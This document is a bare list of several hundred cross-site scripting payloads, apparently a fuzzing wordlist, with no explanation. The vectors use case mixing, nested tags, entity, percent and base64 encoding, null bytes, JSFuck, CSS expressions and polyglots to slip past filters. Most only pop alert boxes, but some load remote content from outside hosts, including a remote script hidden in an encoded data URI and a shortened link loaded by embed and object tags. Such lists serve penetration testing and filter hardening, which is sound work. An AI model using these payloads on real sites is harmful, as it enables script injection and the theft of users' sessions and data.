'><ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>
<scrip<script>t>alert(1)</script>
"><scrip<script>t>alert(1)</script>
'><scrip<script>t>alert(1)</script>
javasCript:eval%28'aler'+'t'+'%28%29'%29
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
Data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
<img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>
"><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>
'><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>
<IMG SRC="jav	ascript:alert('X');">
"><IMG SRC="jav	ascript:alert('X');">
'><IMG SRC="jav	ascript:alert('X');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("X")>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("X")>
'><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("X")>
\";alert('X');//
&#x00027;; confirm(1); &#x00027;
&#39;; confirm(1); &#39;
%27; confirm(1); %27
&apos;; confirm(1); &apos;
\u0027 confirm(1); \u0027
"; [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])(); "
"; eval('\u0061'+'\x6c'+'e'+'r'+'t')(2); "
"; alert&#40 3&#41 ; "
"; javascript:&#x61;ler\u0074&lpar;4); "
"; javascript:window.open('data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='); "
"onmouseover="alert(1)
&#34;onmouseover=&#34;alert(1)
&#x00022;onmouseover=&#x00022;alert(1)
%22onmouseover=%22alert(1)
&quot;onmouseover=&quot;alert(1)
\u0022onmouseover=\u0022alert(1)
width:expression(prompt(1))
width:ex/**/pression(prompt(1))
width&#x3A;ex/**/pression&#x28;prompt&#x28;1&#x29;&#x29;
width:expression\28 prompt \28 1 \29 \29
width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029"
background-image: url(javascript:prompt(1))
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
"><img src=x onerror=window.open('http://www.opensecurity.in/');>
<object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
"><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
'><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
<svg+onload=confirm(1);>
"><svg+onload=confirm(1);>
'><svg+onload=confirm(1);>
<svg onload=prompt(1);>
"><svg onload=prompt(1);>
'><svg onload=prompt(1);>
<input+onfocus=alert(1)>
"><input+onfocus=alert(1)>
'><input+onfocus=alert(1)>
???script?alert(1)?/script?
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
<a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>
"><a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>
'><a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>
<scr\x00ipt>confirm(1);</scr\x00ipt>
"><scr\x00ipt>confirm(1);</scr\x00ipt>
'><scr\x00ipt>confirm(1);</scr\x00ipt>
<svg/onload=prompt(1);>
"><svg/onload=prompt(1);>
'><svg/onload=prompt(1);>
<svg><script>alert&#40/1/&#41</script>
"><svg><script>alert&#40/1/&#41</script>
'><svg><script>alert&#40/1/&#41</script>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"><isindex action="javas&Tab;cript:alert(1)" type=image>
'><isindex action="javas&Tab;cript:alert(1)" type=image>
<form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
"><form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
'><form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
<form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK
"><form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK
'><form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK
<form action=javascript&NewLine;:alert(1)><input type=submit>
"><form action=javascript&NewLine;:alert(1)><input type=submit>
'><form action=javascript&NewLine;:alert(1)><input type=submit>
<form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
"><form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
'><form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
<form action="&Tab;javas&Tab;cript&Tab;:alert('X :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
"><form action="&Tab;javas&Tab;cript&Tab;:alert('X :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
'><form action="&Tab;javas&Tab;cript&Tab;:alert('X :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
<form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
"><form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
'><form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)
"></plaintext\></|\><plaintext/onmouseover=prompt(1)
'></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/X/) type=submit>'-->"></script><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>'"><img src="http://8pwn.com/xss_serve_payloads/X.jpg">
<script>var url = "<!--<script>";//</script>alert(1)</script>
</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>
"><script>var url = "<!--<script>";//</script>alert(1)</script>
</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>
'><script>var url = "<!--<script>";//</script>alert(1)</script>
</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>
<form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
"><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
'><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
<iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
"><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
'><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
"><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
'><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
<img/src='http://8pwn.com/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)
"><img/src='http://8pwn.com/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)
'><img/src='http://8pwn.com/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)
<svg><script>alert&#40 1&#41
"><svg><script>alert&#40 1&#41
'><svg><script>alert&#40 1&#41
<embed/src=//dwz.cn/6xpb1k>
"><embed/src=//dwz.cn/6xpb1k>
'><embed/src=//dwz.cn/6xpb1k>
<object/data=//dwz.cn/6xpb1k>
"><object/data=//dwz.cn/6xpb1k>
'><object/data=//dwz.cn/6xpb1k>
x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")
x: /**/ression(alert(1))('\')exp\')
/*@cc_on alert(1) @*/
{get[alert`1`](){}}
a= {get[alert`1`](){}}
alert`1`
-alert`1`-
+alert`1`+
+alert(1)+'
\u{0000000000000061}lert(1)
"onmouseover=%0A"confirm(1)
/src=data:,alert(1)
accesskey="X" onclick="alert(1)""
accesskey=X onclick=alert(1)
$})}}}});alert(1);({0:{0:{0:function(){0({
''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}
javascript://'/</title></style></textarea></script>--><p"%0A onclick=alert(1)//>*/alert(1)/*
javascript://--></script></title></style>"/</textarea>*/<alert(1)/*'%0A onclick=alert(1)//>a
javascript://</title>"/</script></style></textarea/-->*/<alert(1)/*'%0D%0A onclick=alert(1)//>/
javascript://'/</title></style></textarea></script>--><p"%0D%0A onclick=alert(1)//>*/alert(1)/*
%09javascript://'/</title></style></textarea></script>--><p"%0D%0A onclick=alert(1)//>*/alert(1)/*
javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:alert(1)//</title></style></script>-->";alert(1)//*/alert(1)/*<a ';alert(1)//\' onclick=alert(1)//> %0D %0A alert(1)//
javascript:alert(1)//--></script></textarea></style></title><a"//' onclick=alert(1)//>*/alert(1)/*
avascript:/*--></textarea></style></button></script></meta><select/onclick='+/"/+/[*/[]/+alert(1)//'>
<style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>
"><style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>
'><style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>
<div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div>
"><div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div>
'><div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div>
<div style="x: /**/ression(alert(1))('\')exp\')">
"><div style="x: /**/ression(alert(1))('\')exp\')">
'><div style="x: /**/ression(alert(1))('\')exp\')">
<script>/*@cc_on alert(1) @*/</script>
</ScrIpt><script>/*@cc_on alert(1) @*/</script>
"><script>/*@cc_on alert(1) @*/</script>
</ScrIpt><script>/*@cc_on alert(1) @*/</script>
'><script>/*@cc_on alert(1) @*/</script>
</ScrIpt><script>/*@cc_on alert(1) @*/</script>
<picture><source srcset=1><img onerror=alert(1)>
"><picture><source srcset=1><img onerror=alert(1)>
'><picture><source srcset=1><img onerror=alert(1)>
<script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>
</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>
"><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>
</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>
'><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>
</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>
<script>alert`1`</script>
</ScrIpt><script>alert`1`</script>
"><script>alert`1`</script>
</ScrIpt><script>alert`1`</script>
'><script>alert`1`</script>
</ScrIpt><script>alert`1`</script>
<svg><script>prompt(1)<p
"><svg><script>prompt(1)<p
'><svg><script>prompt(1)<p
<div/onmouseover=confirm(1)>div</div
"><div/onmouseover=confirm(1)>div</div
'><div/onmouseover=confirm(1)>div</div
<input onresize=alert(1)>
"><input onresize=alert(1)>
'><input onresize=alert(1)>
<input onActivate=alert(1) autofocus>
"><input onActivate=alert(1) autofocus>
'><input onActivate=alert(1) autofocus>
<input onBeforeActivate=alert(1) autofocus>
"><input onBeforeActivate=alert(1) autofocus>
'><input onBeforeActivate=alert(1) autofocus>
<input type="hidden" accesskey="X" onclick="alert(1)">
"><input type="hidden" accesskey="X" onclick="alert(1)">
'><input type="hidden" accesskey="X" onclick="alert(1)">
<script>a= {get[alert`1`](){}}</script>
</ScrIpt><script>a= {get[alert`1`](){}}</script>
"><script>a= {get[alert`1`](){}}</script>
</ScrIpt><script>a= {get[alert`1`](){}}</script>
'><script>a= {get[alert`1`](){}}</script>
</ScrIpt><script>a= {get[alert`1`](){}}</script>
<script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
"><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
'><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
<script/src=data:,alert(1)>
"><script/src=data:,alert(1)>
'><script/src=data:,alert(1)></script>
"><script/src=data:,alert(1)>
"><script/src=data:,alert(1)>
'><script/src=data:,alert(1)></script>
'><script/src=data:,alert(1)>
"><script/src=data:,alert(1)>
'><script/src=data:,alert(1)></script>
<input/autofocus/onfocus=alert(1)>
"><input/autofocus/onfocus=alert(1)>
'><input/autofocus/onfocus=alert(1)>
</script><svg><script>alert(1)+&quot;
"></script><svg><script>alert(1)+&quot;
'></script><svg><script>alert(1)+&quot;
<script/src=data:,alert(1)>
"><script/src=data:,alert(1)>
'><script/src=data:,alert(1)>
<marquee/onstart=alert(1)>
"><marquee/onstart=alert(1)>
'><marquee/onstart=alert(1)>
<video/poster/onerror=alert(1)>
"><video/poster/onerror=alert(1)>
'><video/poster/onerror=alert(1)>
<isindex/autofocus/onfocus=alert(1)>
"><isindex/autofocus/onfocus=alert(1)>
'><isindex/autofocus/onfocus=alert(1)>
<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">
"><body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">
'><body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">
<iframe name=alert(1) src="//x?x=',__defineSetter__('x',eval),x=name,'"></iframe>
"><iframe name=alert(1) src="//x?x=',__defineSetter__('x',eval),x=name,'"></iframe>
'><iframe name=alert(1) src="//x?x=',__defineSetter__('x',eval),x=name,'"></iframe>
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1)
"></plaintext\></|\><plaintext/onmouseover=prompt(1)
'></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg?>
" onclick=alert(1)//<button ? onclick=alert(1)//> */ alert(1)//
javascript:confirm(1)
javascript:confirm(1);
javascript:alert(1)
javascript:alert(1);
avascript&#00058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;alert&lpar;1&rpar;
javascript&colon;alert(1)
javascript&#x3A;alert(1)
j&#x61;v&#x41;sc&#x52;ipt&#x3A;alert(1)
j&#x61;v&#x41;sc&#x52;ipt&#x3A;al&#x65;rt&lpar;1&rpar;
vbscript:alert(1);
vbscript&#00058;alert(1);
vbscr&Tab;ipt:alert(1)"
<iframesrc="javascript:alert(2)">
"><iframesrc="javascript:alert(2)">
'><iframesrc="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
"><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
'><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
<isindexformaction="javascript:alert(1)" type=image>
"><isindexformaction="javascript:alert(1)" type=image>
'><isindexformaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
"><input type="image" formaction=JaVaScript:alert(0)>
'><input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME
"><form><button formaction=javascript&colon;alert(1)>CLICKME
'><form><button formaction=javascript&colon;alert(1)>CLICKME
<form action="Javascript:alert(1)"><input type=submit>
"><form action="Javascript:alert(1)"><input type=submit>
'><form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
"><isindex action="javascript:alert(1)" type=image>
'><isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
"><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
'><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
"><isindex action=data:text/html, type=image>
'><isindex action=data:text/html, type=image>
?/><marquee onfinish=confirm(1)>a</marquee>
<object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
"><object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
'><object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
<img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
"><img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
'><img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
<script>alert('X')</script>=a
</ScrIpt><script>alert('X')</script>=a
"><script>alert('X')</script>=a
</ScrIpt><script>alert('X')</script>=a
'><script>alert('X')</script>=a
</ScrIpt><script>alert('X')</script>=a
<script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
"><script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
'><script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
';!--"<XSS><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
"><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
'><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>={()}
<script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
"><script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
'><script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
asfunction:getURL,javascript:alert(1)//
\%22))}catch(e){}if(!self.a)self.a=!alert(1)//
"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D//
<button/onclick=alert(1) >X</button>
"><button/onclick=alert(1) >X</button>
'><button/onclick=alert(1) >X</button>
<a onmouseover=(alert(1))>X</a>
"><a onmouseover=(alert(1))>X</a>
'><a onmouseover=(alert(1))>X</a>
<p/onmouseover=javascript:alert(1); >X</p>
"><p/onmouseover=javascript:alert(1); >X</p>
'><p/onmouseover=javascript:alert(1); >X</p>
<article xmlns="><img src=x onerror=alert(1)"></article>
"><article xmlns="><img src=x onerror=alert(1)"></article>
'><article xmlns="><img src=x onerror=alert(1)"></article>
<article xmlns="x:img src=x onerror=alert(1) ">
"><article xmlns="x:img src=x onerror=alert(1) ">
'><article xmlns="x:img src=x onerror=alert(1) ">
<p style="font-family:'\22\3bx:expression(alert(1))/*'">
"><p style="font-family:'\22\3bx:expression(alert(1))/*'">
'><p style="font-family:'\22\3bx:expression(alert(1))/*'">
<listing>&ltimg src=x onerror=alert(1)&gt</listing>
"><listing>&ltimg src=x onerror=alert(1)&gt</listing>
'><listing>&ltimg src=x onerror=alert(1)&gt</listing>
"onmouseover=alert(1);a="
'+alert(1)&&null=='
+alert(1)&&null=='
\\\'><script>1<\\/script>
\\\'><body onload=\\\'1\\\'>
\"><script>1<\\/script>
><script>1<\\/script>
\"><body onload=\"1\">
<img src=\"x:X\" onerror=\"alert(1)\">
"><img src=\"x:X\" onerror=\"alert(1)\">
'><img src=\"x:X\" onerror=\"alert(1)\">
<img src=a onerror=alert(1)
"><img src=a onerror=alert(1)
'><img src=a onerror=alert(1)
<script>alert(\'1\')</script>
</ScrIpt><script>alert(\'1\')</script>
"><script>alert(\'1\')</script>
</ScrIpt><script>alert(\'1\')</script>
'><script>alert(\'1\')</script>
</ScrIpt><script>alert(\'1\')</script>
<script>alert(\'\\\\1\\\\\')</script>
</ScrIpt><script>alert(\'\\\\1\\\\\')</script>
"><script>alert(\'\\\\1\\\\\')</script>
</ScrIpt><script>alert(\'\\\\1\\\\\')</script>
'><script>alert(\'\\\\1\\\\\')</script>
</ScrIpt><script>alert(\'\\\\1\\\\\')</script>
<script>alert(\'\\/\\1\\/\\\')</script>
</ScrIpt><script>alert(\'\\/\\1\\/\\\')</script>
"><script>alert(\'\\/\\1\\/\\\')</script>
</ScrIpt><script>alert(\'\\/\\1\\/\\\')</script>
'><script>alert(\'\\/\\1\\/\\\')</script>
</ScrIpt><script>alert(\'\\/\\1\\/\\\')</script>
\'\'\">
<scri%00pt>alert(1);</scri%00pt>
"><scri%00pt>alert(1);</scri%00pt>
'><scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
"><scri\x00pt>alert(1);</scri%00pt>
'><scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
"><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
'><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
<script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
"><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
'><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
<%0ascript>alert(1);</script>
"><%0ascript>alert(1);</script>
'><%0ascript>alert(1);</script>
<%0bscript>alert(1);</script>
"><%0bscript>alert(1);</script>
'><%0bscript>alert(1);</script>
<SCRIPT> alert(\"1\");</SCRIPT>
</ScrIpt><SCRIPT> alert(\"1\");</SCRIPT>
"><SCRIPT> alert(\"1\");</SCRIPT>
</ScrIpt><SCRIPT> alert(\"1\");</SCRIPT>
'><SCRIPT> alert(\"1\");</SCRIPT>
</ScrIpt><SCRIPT> alert(\"1\");</SCRIPT>
<SCRIPT> alert(\"1\")</SCRIPT>
</ScrIpt><SCRIPT> alert(\"1\")</SCRIPT>
"><SCRIPT> alert(\"1\")</SCRIPT>
</ScrIpt><SCRIPT> alert(\"1\")</SCRIPT>
